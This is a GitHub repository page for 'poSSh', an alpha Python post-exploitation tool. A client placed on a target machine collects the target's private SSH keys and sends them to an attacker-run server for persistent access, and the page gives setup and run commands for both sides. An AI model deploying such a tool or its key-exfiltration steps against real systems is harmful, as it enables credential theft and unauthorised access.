Skip to content

poSSh is a post-exploitation tool written in python. It uses the private key of target for persistence.(Alpha)

License

Notifications You must be signed in to change notification settings

sc4rfurry/poSSh

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

poSSh (Alpha)

Post Exploitation Tool for persistence using ssh.

poSSh is a post-exploitation tool written in python. It uses the private key of target for persistence.(Alpha)

==> How it works..

Server

  • Check for Internet Connection.
  • Start server using wan(ipv4) address.
  • Generate Security Key.
  • Exchange Security key with Client.
  • Get the Private SSh key(s) from client.
  • Save the Private key.
  • Save the logs.

Client

  • Connect to Server using Socket.
  • Exchange Security key from Server.
  • Get Private SSH key(s) from target.
  • Send private key(s) to server.

Features

  • The tool is in alpha right now.

Installation

poSSh requires Python3 v3.8 or Greater to run.

Install the dependencies and start the server.

Server

git clone https://github.com/sc4rfurry/poSSh.git
cd poSSh
pip3 install -r requirements.txt
python3 main.py [port]

Client

Just copy the client from poSSh-client/client.py to the target machine.

python3 client.py [server_ip] [port]

About

poSSh is a post-exploitation tool written in python. It uses the private key of target for persistence.(Alpha)

Resources

License

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages